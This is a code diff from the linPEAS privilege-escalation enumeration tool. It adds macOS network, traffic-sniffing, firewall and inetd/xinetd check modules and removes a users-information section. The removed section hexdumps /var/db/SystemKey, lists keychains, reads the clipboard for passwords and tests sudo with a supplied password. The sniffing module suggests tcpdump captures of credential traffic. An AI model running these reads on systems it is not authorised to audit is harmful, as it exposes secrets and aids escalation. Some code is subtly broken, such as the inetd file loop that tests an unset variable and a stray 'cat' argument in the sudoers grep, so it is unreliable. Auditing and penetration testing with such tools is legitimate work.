@ -0,0 +1,88 @@
 # Title: Network Information - MacOS network capabilities
 # ID: NT_Macos_network_capabilities
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: MacOS network Capabilities
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_3title, warn_exec
 # Global Variables: $MACPEAS, $EXTRA_CHECKS
 # Initial Functions:
 # Generated Global Variables: $net_service
 # Fat linpeas: 0
 # Small linpeas: 0
 # Function to get network capabilities information
 get_macos_network_capabilities() {
    print_2title "Network Capabilities"
    # Basic network information
    echo ""
    print_3title "Network Interfaces and Configuration"
    warn_exec system_profiler SPNetworkDataType
    # Network locations
    echo ""
    print_3title "Network Locations"
    warn_exec system_profiler SPNetworkLocationDataType
    # Network extensions
    echo ""
    print_3title "Network Extensions"
    if [ -d "/Library/SystemExtensions" ]; then
        warn_exec systemextensionsctl list
    fi
    # Network security
    echo ""
    print_3title "Network Security"
    if command -v networksetup >/dev/null 2>&1; then
        echo "Firewall Status:"
        warn_exec networksetup -getglobalstate
        echo -e "\nFirewall Rules:"
        warn_exec networksetup -listallnetworkservices | while read -r net_service; do
            if [ -n "$net_service" ]; then
                echo "Service: $net_service"
                warn_exec networksetup -getwebproxy "$net_service"
                warn_exec networksetup -getsecurewebproxy "$net_service"
                warn_exec networksetup -getproxybypassdomains "$net_service"
            fi
        done
    fi
    # Additional network information if EXTRA_CHECKS is enabled
    if [ "$EXTRA_CHECKS" ]; then
        # Network preferences
        echo ""
        print_3title "Network Preferences"
        if [ -f "/Library/Preferences/SystemConfiguration/preferences.plist" ]; then
            warn_exec plutil -p /Library/Preferences/SystemConfiguration/preferences.plist | grep -A 5 "NetworkServices"
        fi
        # Network statistics
        echo ""
        print_3title "Network Statistics"
        warn_exec netstat -s
        # Network routes
        echo ""
        print_3title "Network Routes"
        warn_exec netstat -rn
        # Network interfaces details
        echo ""
        print_3title "Network Interfaces Details"
        warn_exec ifconfig -a
        # Network kernel extensions
        echo ""
        print_3title "Network Kernel Extensions"
        warn_exec kextstat | grep -i network
    fi
    echo ""
 }
 if [ "$MACPEAS" ]; then
    get_macos_network_capabilities
 fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/6_Macos_network_services.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/6_Macos_network_services.sh
@ -0,0 +1,164 @@
 # Title: Network Information - MacOS Network Services
 # ID: NT_Macos_network_services
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Enumerate macos network services
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_3title, warn_exec
 # Global Variables: $EXTRA_CHECKS, $MACPEAS, $E, $SED_RED
 # Initial Functions:
 # Generated Global Variables: $sharing_service, $profile, $port3, $service_count, $port1, $port, $services, $total, $port_list, $count, $ports, $active_ports, $port2
 # Fat linpeas: 0
 # Small linpeas: 0
 # Function to check if a port is listening
 check_listening_port() {
    local port=$1
    local service=$2
    local count=0
    # Check both IPv4 and IPv6
    count=$(netstat -na 2>/dev/null | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.${port}" | wc -l)
    echo "$count"
 }
 # Function to get sharing services status
 get_sharing_services_status() {
    print_2title "MacOS Sharing Services Status"
    # Define services and their ports using parallel arrays
    services="Screen Sharing File Sharing Remote Login Remote Management Remote Apple Events Back to My Mac AirPlay Receiver AirDrop Bonjour Printer Sharing Internet Sharing"
    ports="5900 88,445,548 22 3283 3031 4488 7000 5353 5353 515,631 67,68"
    # Check each service
    echo "Service Status (0=OFF, >0=ON):"
    echo "--------------------------------"
    # Get number of services
    service_count=$(echo "$services" | wc -w)
    # Loop through services using index
    i=1
    while [ $i -le $service_count ]; do
        sharing_service=$(echo "$services" | cut -d' ' -f$i)
        port_list=$(echo "$ports" | cut -d' ' -f$i)
        total=0
        active_ports=""
        # Check each port for the service
        port1=$(echo "$port_list" | cut -d',' -f1)
        port2=$(echo "$port_list" | cut -d',' -f2)
        port3=$(echo "$port_list" | cut -d',' -f3)
        for port in $port1 $port2 $port3; do
            if [ -n "$port" ]; then
                count=$(check_listening_port "$port" "$sharing_service")
                if [ "$count" -gt 0 ]; then
                    total=$((total + count))
                    if [ -n "$active_ports" ]; then
                        active_ports="${active_ports},"
                    fi
                    active_ports="${active_ports}${port}"
                fi
            fi
        done
        # Print service status
        if [ "$total" -gt 0 ]; then
            printf "%-20s: ON  (Ports: %s)\n" "$sharing_service" "$active_ports" | sed -${E} "s,ON.*,${SED_RED},g"
        else
            printf "%-20s: OFF\n" "$sharing_service"
        fi
        i=$((i + 1))
    done
    echo ""
 }
 # Function to get VPN information
 get_vpn_info() {
    print_3title "VPN Information"
    # Get VPN configurations
    warn_exec system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED},g"
    # Check for VPN profiles
    if [ -d "/Library/Preferences/SystemConfiguration" ]; then
        echo -e "\nVPN Profiles:"
        find /Library/Preferences/SystemConfiguration -name "*.plist" -exec grep -l "VPN" {} \; 2>/dev/null | while read -r profile; do
            echo "Profile: $profile"
            warn_exec plutil -p "$profile" | grep -A 5 "VPN"
        done
    fi
    echo ""
 }
 # Function to get firewall information
 get_firewall_info() {
    print_3title "Firewall Information"
    # Get firewall status
    warn_exec system_profiler SPFirewallDataType
    # Get application firewall rules
    if command -v /usr/libexec/ApplicationFirewall/socketfilterfw >/dev/null 2>&1; then
        echo -e "\nApplication Firewall Rules:"
        warn_exec /usr/libexec/ApplicationFirewall/socketfilterfw --listapps
    fi
    # Get pf firewall rules if available
    if command -v pfctl >/dev/null 2>&1; then
        echo -e "\nPF Firewall Rules:"
        warn_exec pfctl -s rules 2>/dev/null
    fi
    echo ""
 }
 # Function to get additional network information
 get_additional_network_info() {
    if [ "$EXTRA_CHECKS" ]; then
        print_3title "Additional Network Information"
        # Bluetooth information
        echo "Bluetooth Status:"
        warn_exec system_profiler SPBluetoothDataType
        # Ethernet information
        echo -e "\nEthernet Status:"
        warn_exec system_profiler SPEthernetDataType
        # USB network adapters
        echo -e "\nUSB Network Adapters:"
        warn_exec system_profiler SPUSBDataType
        # Network kernel extensions
        echo -e "\nNetwork Kernel Extensions:"
        warn_exec kextstat | grep -i "network\|ethernet\|wifi\|bluetooth"
        # Network daemons
        echo -e "\nNetwork Daemons:"
        warn_exec launchctl list | grep -i "network\|vpn\|firewall\|sharing"
    fi
    echo ""
 }
 # Main function to get all network services information
 get_macos_network_services() {
    if [ "$MACPEAS" ]; then
        # Get sharing services status
        get_sharing_services_status
        # Get VPN information
        get_vpn_info
        # Get firewall information
        get_firewall_info
        # Get additional network information if EXTRA_CHECKS is enabled
        get_additional_network_info
    fi
 }
 if [ "$MACPEAS" ]; then
    get_macos_network_services
 fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/7_Tcpdump.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/7_Tcpdump.sh
@ -0,0 +1,168 @@
 # Title: Network Information - Network Traffic Analysis
 # ID: NT_Tcpdump
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Check network traffic analysis capabilities and tools
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_3title, print_info, warn_exec
 # Global Variables: $EXTRA_CHECKS, $E, $SED_RED, $SED_GREEN
 # Initial Functions:
 # Generated Global Variables: $tools_found, $tool, $interfaces, $interfaces_found, $iface, $cmd, $pattern, $patterns
 # Fat linpeas: 0
 # Small linpeas: 1
 # Function to check if a command exists and is executable
 check_command() {
    local cmd=$1
    if command -v "$cmd" >/dev/null 2>&1; then
        if [ -x "$(command -v "$cmd")" ]; then
            return 0
        fi
    fi
    return 1
 }
 # Function to check if we can sniff on an interface
 check_interface_sniffable() {
    local iface=$1
    if timeout 1 tcpdump -i "$iface" -c 1 >/dev/null 2>&1; then
        return 0
    fi
    return 1
 }
 # Function to check for promiscuous mode
 check_promiscuous_mode() {
    local iface=$1
    if ip link show "$iface" 2>/dev/null | grep -q "PROMISC"; then
        return 0
    fi
    return 1
 }
 # Main function to check network traffic analysis capabilities
 check_network_traffic_analysis() {
    print_2title "Network Traffic Analysis Capabilities"
    # Check for sniffing tools
    echo ""
    print_3title "Available Sniffing Tools"
    tools_found=0
    if check_command tcpdump; then
        echo "tcpdump is available" | sed -${E} "s,.*,${SED_GREEN},g"
        tools_found=1
        # Check tcpdump version and capabilities
        warn_exec tcpdump --version 2>/dev/null | head -n 1
    fi
    if check_command tshark; then
        echo "tshark is available" | sed -${E} "s,.*,${SED_GREEN},g"
        tools_found=1
        # Check tshark version
        warn_exec tshark --version 2>/dev/null | head -n 1
    fi
    if check_command wireshark; then
        echo "wireshark is available" | sed -${E} "s,.*,${SED_GREEN},g"
        tools_found=1
    fi
    if [ $tools_found -eq 0 ]; then
        echo "No sniffing tools found" | sed -${E} "s,.*,${SED_RED},g"
    fi
    # Check network interfaces
    echo ""
    print_3title "Network Interfaces Sniffing Capabilities"
    interfaces_found=0
    # Get list of network interfaces
    if command -v ip >/dev/null 2>&1; then
        interfaces=$(ip -o link show | awk -F': ' '{print $2}')
    elif command -v ifconfig >/dev/null 2>&1; then
        interfaces=$(ifconfig -a | grep -o '^[^ ]*:' | tr -d ':')
    else
        interfaces=$(ls /sys/class/net/ 2>/dev/null)
    fi
    for iface in $interfaces; do
        if [ "$iface" != "lo" ]; then  # Skip loopback
            echo -n "Interface $iface: "
            if check_interface_sniffable "$iface"; then
                echo "Sniffable" | sed -${E} "s,.*,${SED_GREEN},g"
                interfaces_found=1
                # Check promiscuous mode
                if check_promiscuous_mode "$iface"; then
                    echo "  - Promiscuous mode enabled" | sed -${E} "s,.*,${SED_RED},g"
                fi
                # Get interface details
                if [ "$EXTRA_CHECKS" ]; then
                    echo "  - Interface details:"
                    warn_exec ip addr show "$iface" 2>/dev/null || ifconfig "$iface" 2>/dev/null
                fi
            else
                echo "Not sniffable" | sed -${E} "s,.*,${SED_RED},g"
            fi
        fi
    done
    if [ $interfaces_found -eq 0 ]; then
        echo "No sniffable interfaces found" | sed -${E} "s,.*,${SED_RED},g"
    fi
    # Check for sensitive traffic patterns if we have sniffing capabilities
    if [ $tools_found -eq 1 ] && [ $interfaces_found -eq 1 ]; then
        echo ""
        print_3title "Sensitive Traffic Detection"
        print_info "Checking for common sensitive traffic patterns..."
        # List of sensitive traffic patterns to check
        patterns="
            - HTTP Basic Auth
            - FTP credentials
            - SMTP credentials
            - MySQL/MariaDB traffic
            - PostgreSQL traffic
            - Redis traffic
            - MongoDB traffic
            - LDAP traffic
            - SMB traffic
            - DNS queries
            - SNMP traffic
            - Many more...
        "
        echo "$patterns" | while read -r pattern; do
            if [ -n "$pattern" ]; then
                echo "$pattern"
            fi
        done
        print_info "To capture sensitive traffic, you can use:"
        echo "tcpdump -i <interface> -w capture.pcap" | sed -${E} "s,.*,${SED_GREEN},g"
        echo "tshark -i <interface> -w capture.pcap" | sed -${E} "s,.*,${SED_GREEN},g"
    fi
    # Additional information
    if [ "$EXTRA_CHECKS" ]; then
        echo ""
        print_3title "Additional Network Analysis Information"
        # Check for network monitoring tools
        echo "Checking for network monitoring tools..."
        for tool in nethogs iftop iotop nload bmon; do
            if check_command "$tool"; then
                echo "$tool is available" | sed -${E} "s,.*,${SED_GREEN},g"
            fi
        done
    fi
    echo ""
 }
 # Run the main function
 check_network_traffic_analysis
--- a/linPEAS/builder/linpeas_parts/5_network_information/8_Iptables.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/8_Iptables.sh
@ -0,0 +1,210 @@
 # Title: Network Information - Firewall Rules Analysis
 # ID: NT_Iptables
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Analyze firewall rules and configurations
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_3title, warn_exec, echo_not_found
 # Global Variables: $EXTRA_CHECKS, $E, $SED_RED, $SED_GREEN, $SED_YELLOW
 # Initial Functions:
 # Generated Global Variables: $rules_file, $cmd, $tool, $config_file
 # Fat linpeas: 0
 # Small linpeas: 1
 # Function to check if a command exists and is executable
 check_command() {
    local cmd=$1
    if command -v "$cmd" >/dev/null 2>&1; then
        if [ -x "$(command -v "$cmd")" ]; then
            return 0
        fi
    fi
    return 1
 }
 # Function to analyze iptables rules
 analyze_iptables() {
    echo ""
    print_3title "Iptables Rules"
    # Check if iptables is available
    if ! check_command iptables; then
        echo_not_found "iptables"
        return
    fi
    # Check if we have permission to list rules
    if ! timeout 1 iptables -L >/dev/null 2>&1; then
        echo "No permission to list iptables rules" | sed -${E} "s,.*,${SED_RED},g"
        return
    fi
    # Get iptables version
    warn_exec iptables --version 2>/dev/null
    # List all chains and rules
    echo -e "\nFilter Table Rules:"
    warn_exec iptables -L -v -n 2>/dev/null
    echo -e "\nNAT Table Rules:"
    warn_exec iptables -t nat -L -v -n 2>/dev/null
    echo -e "\nMangle Table Rules:"
    warn_exec iptables -t mangle -L -v -n 2>/dev/null
    # Check for custom chains
    echo -e "\nCustom Chains:"
    warn_exec iptables -L -v -n | grep -E "^Chain [A-Za-z]" | grep -v "INPUT\|OUTPUT\|FORWARD\|PREROUTING\|POSTROUTING" 2>/dev/null
    # Check for saved rules
    echo -e "\nSaved Rules:"
    for rules_file in /etc/iptables/* /etc/iptables/rules.v4 /etc/iptables/rules.v6 /etc/iptables-save /etc/iptables.save; do
        if [ -f "$rules_file" ]; then
            echo "Found rules in $rules_file:"
            warn_exec cat "$rules_file" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
        fi
    done
 }
 # Function to analyze nftables rules
 analyze_nftables() {
    echo ""
    print_3title "Nftables Rules"
    # Check if nft is available
    if ! check_command nft; then
        echo_not_found "nftables"
        return
    fi
    # Check if we have permission to list rules
    if ! timeout 1 nft list ruleset >/dev/null 2>&1; then
        echo "No permission to list nftables rules" | sed -${E} "s,.*,${SED_RED},g"
        return
    fi
    # Get nftables version
    warn_exec nft --version 2>/dev/null
    # List all rules
    echo -e "\nNftables Ruleset:"
    warn_exec nft list ruleset 2>/dev/null
    # Check for saved rules
    echo -e "\nSaved Rules:"
    for rules_file in /etc/nftables.conf /etc/sysconfig/nftables.conf; do
        if [ -f "$rules_file" ]; then
            echo "Found rules in $rules_file:"
            warn_exec cat "$rules_file" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
        fi
    done
 }
 # Function to analyze firewalld rules
 analyze_firewalld() {
    echo ""
    print_3title "Firewalld Rules"
    # Check if firewall-cmd is available
    if ! check_command firewall-cmd; then
        echo_not_found "firewalld"
        return
    fi
    # Check if firewalld is running
    if ! systemctl is-active firewalld >/dev/null 2>&1; then
        echo "Firewalld is not running" | sed -${E} "s,.*,${SED_YELLOW},g"
        return
    fi
    # Get firewalld version
    warn_exec firewall-cmd --version 2>/dev/null
    # List all zones
    echo -e "\nFirewalld Zones:"
    warn_exec firewall-cmd --list-all-zones 2>/dev/null
    # List active zones
    echo -e "\nActive Zones:"
    warn_exec firewall-cmd --get-active-zones 2>/dev/null
    # List services
    echo -e "\nAvailable Services:"
    warn_exec firewall-cmd --list-services 2>/dev/null
    # List ports
    echo -e "\nOpen Ports:"
    warn_exec firewall-cmd --list-ports 2>/dev/null
    # List rich rules
    echo -e "\nRich Rules:"
    warn_exec firewall-cmd --list-rich-rules 2>/dev/null
 }
 # Function to analyze UFW rules
 analyze_ufw() {
    echo ""
    print_3title "UFW Rules"
    # Check if ufw is available
    if ! check_command ufw; then
        echo_not_found "ufw"
        return
    fi
    # Check if UFW is running
    if ! ufw status >/dev/null 2>&1; then
        echo "UFW is not running" | sed -${E} "s,.*,${SED_YELLOW},g"
        return
    fi
    # Get UFW version
    warn_exec ufw version 2>/dev/null
    # List rules
    echo -e "\nUFW Rules:"
    warn_exec ufw status verbose 2>/dev/null
    # List numbered rules
    echo -e "\nNumbered Rules:"
    warn_exec ufw status numbered 2>/dev/null
 }
 # Main function to analyze firewall rules
 analyze_firewall_rules() {
    print_2title "Firewall Rules Analysis"
    # Analyze different firewall systems
    analyze_iptables
    analyze_nftables
    analyze_firewalld
    analyze_ufw
    # Additional checks if EXTRA_CHECKS is enabled
    if [ "$EXTRA_CHECKS" ]; then
        echo ""
        print_3title "Additional Firewall Information"
        # Check for common firewall configuration files
        echo "Checking for firewall configuration files..."
        for config_file in /etc/sysconfig/iptables /etc/sysconfig/ip6tables /etc/iptables/rules.v4 /etc/iptables/rules.v6 /etc/nftables.conf /etc/ufw/user.rules /etc/ufw/user6.rules; do
            if [ -f "$config_file" ]; then
                echo "Found configuration file: $config_file" | sed -${E} "s,.*,${SED_GREEN},g"
            fi
        done
        # Check for firewall management tools
        echo -e "\nChecking for firewall management tools..."
        for tool in shorewall shorewall6 ferm; do
            if check_command "$tool"; then
                echo "$tool is available" | sed -${E} "s,.*,${SED_GREEN},g"
            fi
        done
    fi
    echo ""
 }
 # Run the main function
 analyze_firewall_rules
--- a/linPEAS/builder/linpeas_parts/5_network_information/9_Inetdconf.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/9_Inetdconf.sh
@ -0,0 +1,192 @@
 # Title: Network Information - Inetd/Xinetd Services Analysis
 # ID: NT_Inetdconf
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Analyze inetd and xinetd services and configurations
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_3title, warn_exec, echo_not_found
 # Global Variables: $EXTRA_CHECKS, $E, $SED_RED, $SED_GREEN, $SED_YELLOW
 # Initial Functions:
 # Generated Global Variables: $inetd_service, $log_file, $cmd, $service_name, $conf_file, $service_dir, $service_file, $inetd_file
 # Fat linpeas: 0
 # Small linpeas: 0
 # Function to check if a command exists and is executable
 check_command() {
    local cmd=$1
    if command -v "$cmd" >/dev/null 2>&1; then
        if [ -x "$(command -v "$cmd")" ]; then
            return 0
        fi
    fi
    return 1
 }
 # Function to analyze inetd services
 analyze_inetd() {
    echo ""
    print_3title "Inetd Services"
    # Check if inetd is installed
    if ! check_command inetd; then
        echo_not_found "inetd"
        return
    fi
    # Check if inetd is running
    if ! pgrep -x inetd >/dev/null 2>&1; then
        echo "inetd is not running" | sed -${E} "s,.*,${SED_YELLOW},g"
    fi
    # Get inetd version
    warn_exec inetd -v 2>/dev/null
    # Check main configuration file
    if [ -f "/etc/inetd.conf" ]; then
        echo -e "\nInetd Configuration (/etc/inetd.conf):"
        warn_exec cat /etc/inetd.conf | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
        # Check for potentially dangerous services
        echo -e "\nPotentially Dangerous Services:"
        warn_exec cat /etc/inetd.conf | grep -v "^$" | grep -Ev "\W+\#|^#" | grep -iE "shell|login|exec|rsh|rlogin|rexec|finger|telnet|ftp|tftp" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
    else
        echo_not_found "/etc/inetd.conf"
    fi
    # Check for additional configuration files
    echo -e "\nAdditional Inetd Configuration Files:"
    for conf_file in /etc/inetd.d/* /etc/inet/*.conf; do
        if [ -f "$conf_file" ]; then
            echo "Found configuration in $conf_file:"
            warn_exec cat "$conf_file" | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
        fi
    done
 }
 # Function to analyze xinetd services
 analyze_xinetd() {
    echo ""
    print_3title "Xinetd Services"
    # Check if xinetd is installed
    if ! check_command xinetd; then
        echo_not_found "xinetd"
        return
    fi
    # Check if xinetd is running
    if ! pgrep -x xinetd >/dev/null 2>&1; then
        echo "xinetd is not running" | sed -${E} "s,.*,${SED_YELLOW},g"
    fi
    # Get xinetd version
    warn_exec xinetd -version 2>/dev/null
    # Check main configuration file
    if [ -f "/etc/xinetd.conf" ]; then
        echo -e "\nXinetd Configuration (/etc/xinetd.conf):"
        warn_exec cat /etc/xinetd.conf | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
        # Check for included configurations
        echo -e "\nIncluded Configurations:"
        warn_exec grep -r "includedir" /etc/xinetd.conf 2>/dev/null
    else
        echo_not_found "/etc/xinetd.conf"
    fi
    # Check for service-specific configurations
    echo -e "\nService Configurations:"
    for service_dir in /etc/xinetd.d/ /etc/xinetd/; do
        if [ -d "$service_dir" ]; then
            echo "Services in $service_dir:"
            for service_file in "$service_dir"/*; do
                if [ -f "$service_file" ]; then
                    service_name=$(basename "$service_file")
                    echo -e "\nService: $service_name"
                    # Check if service is enabled
                    if grep -q "disable.*=.*no" "$service_file" 2>/dev/null; then
                        echo "Status: Enabled" | sed -${E} "s,.*,${SED_RED},g"
                    else
                        echo "Status: Disabled"
                    fi
                    # Show service configuration
                    warn_exec cat "$service_file" | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
                    # Check for potentially dangerous configurations
                    if grep -qiE "server.*=.*/bin/|server.*=.*/sbin/|server.*=.*/usr/bin/|server.*=.*/usr/sbin/" "$service_file" 2>/dev/null; then
                        echo "Warning: Service uses system binaries" | sed -${E} "s,.*,${SED_RED},g"
                    fi
                    if grep -qiE "user.*=.*root|user.*=.*0" "$service_file" 2>/dev/null; then
                        echo "Warning: Service runs as root" | sed -${E} "s,.*,${SED_RED},g"
                    fi
                fi
            done
        fi
    done
 }
 # Function to check for running inetd/xinetd services
 check_running_services() {
    echo ""
    print_3title "Running Inetd/Xinetd Services"
    # Check netstat for services
    if check_command netstat; then
        echo "Active Services (from netstat):"
        warn_exec netstat -tulpn 2>/dev/null | grep -E "inetd|xinetd" | sed -${E} "s,.*,${SED_RED},g"
    fi
    # Check ss for services
    if check_command ss; then
        echo -e "\nActive Services (from ss):"
        warn_exec ss -tulpn 2>/dev/null | grep -E "inetd|xinetd" | sed -${E} "s,.*,${SED_RED},g"
    fi
    # Check for service processes
    echo -e "\nRunning Service Processes:"
    for inetd_service in $(pgrep -l inetd 2>/dev/null; pgrep -l xinetd 2>/dev/null); do
        echo "$inetd_service" | sed -${E} "s,.*,${SED_RED},g"
    done
 }
 # Main function to analyze inetd/xinetd services
 analyze_inetd_services() {
    print_2title "Inetd/Xinetd Services Analysis"
    # Analyze inetd and xinetd services
    analyze_inetd
    analyze_xinetd
    # Check for running services
    check_running_services
    # Additional checks if EXTRA_CHECKS is enabled
    if [ "$EXTRA_CHECKS" ]; then
        echo ""
        print_3title "Additional Inetd/Xinetd Information"
        # Check for inetd/xinetd logs
        echo "Checking for service logs..."
        for log_file in /var/log/inetd.log /var/log/xinetd.log /var/log/messages /var/log/syslog; do
            if [ -f "$log_file" ]; then
                echo "Found log file: $log_file" | sed -${E} "s,.*,${SED_GREEN},g"
                warn_exec tail -n 20 "$log_file" | grep -iE "inetd|xinetd" 2>/dev/null
            fi
        done
        # Check for inetd/xinetd related files
        echo -e "\nChecking for related files..."
        for file in /etc/init.d/inetd /etc/init.d/xinetd /etc/default/inetd /etc/default/xinetd; do
            if [ -f "$inetd_file" ]; then
                echo "Found file: $inetd_file" | sed -${E} "s,.*,${SED_GREEN},g"
                warn_exec cat "$inetd_file" | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
            fi
        done
    fi
    echo ""
 }
 # Run the main function
 analyze_inetd_services
--- a/linPEAS/builder/linpeas_parts/6_users_information.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information.sh
@ -1,232 +0,0 @@
 ###########################################
 #----------) Users Information (----------#
 ###########################################
 #-- UI) My user
 print_2title "My user"
 print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users"
 (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
 echo ""
 if [ "$MACPEAS" ];then
  print_2title "Current user Login and Logout hooks"
  defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
  echo ""
  print_2title "All Login and Logout hooks"
  defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
  defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist
  echo ""
  print_2title "Keychains"
  print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker"
  security list-keychains
  echo ""
  print_2title "SystemKey"
  ls -l /var/db/SystemKey
  if [ -r "/var/db/SystemKey" ]; then
    echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},";
    hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},";
  fi
  echo ""
 fi
 #-- UI) PGP keys?
 print_2title "Do I have PGP keys?"
 command -v gpg 2>/dev/null || echo_not_found "gpg"
 gpg --list-keys 2>/dev/null
 command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys"
 netpgpkeys --list-keys 2>/dev/null
 command -v netpgp 2>/dev/null || echo_not_found "netpgp"
 echo ""
 #-- UI) Clipboard and highlighted text
 if [ "$(command -v xclip 2>/dev/null)" ] || [ "$(command -v xsel 2>/dev/null)" ] || [ "$(command -v pbpaste 2>/dev/null)" ] || [ "$DEBUG" ]; then
  print_2title "Clipboard or highlighted text?"
  if [ "$(command -v xclip 2>/dev/null)" ]; then
    echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
    echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
  elif [ "$(command -v xsel 2>/dev/null)" ]; then
    echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
    echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
  elif [ "$(command -v pbpaste 2>/dev/null)" ]; then
    echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
  else echo_not_found "xsel and xclip"
  fi
  echo ""
 fi
 #-- UI) Sudo -l
 print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d"
 print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid"
 (echo '' | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo"
 if [ "$PASSWORD" ]; then
  (echo "$PASSWORD" | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g") 2>/dev/null  || echo_not_found "sudo"
 fi
 ( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" ) 2>/dev/null  || echo_not_found "/etc/sudoers"
 if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then
  echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW},"
 fi
 for filename in /etc/sudoers.d/*; do
  if [ -r "$filename" ]; then
    echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g"
    grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g"
  fi
 done
 echo ""
 #-- UI) Sudo tokens
 print_2title "Checking sudo tokens"
 print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens"
 ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
 if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then
  echo "ptrace protection is disabled (0), so sudo tokens could be abused" | sed "s,is disabled,${SED_RED},g";
  if [ "$(command -v gdb 2>/dev/null)" ]; then
    echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g";
  fi
  if [ "$CURRENT_USER_PIVOT_PID" ]; then
    echo "The current user proc $CURRENT_USER_PIVOT_PID is the parent of a different user proccess" | sed -${E} "s,.*,${SED_RED},g";
  fi
  if [ -f "$HOME/.sudo_as_admin_successful" ]; then
    echo "Current user has .sudo_as_admin_successful file, so he can execute with sudo" | sed -${E} "s,.*,${SED_RED},";
  fi
  if ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -qE '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'; then
    echo "Current user has other interactive shells running: " | sed -${E} "s,.*,${SED_RED},g";
    ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -E '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'
  fi
 else
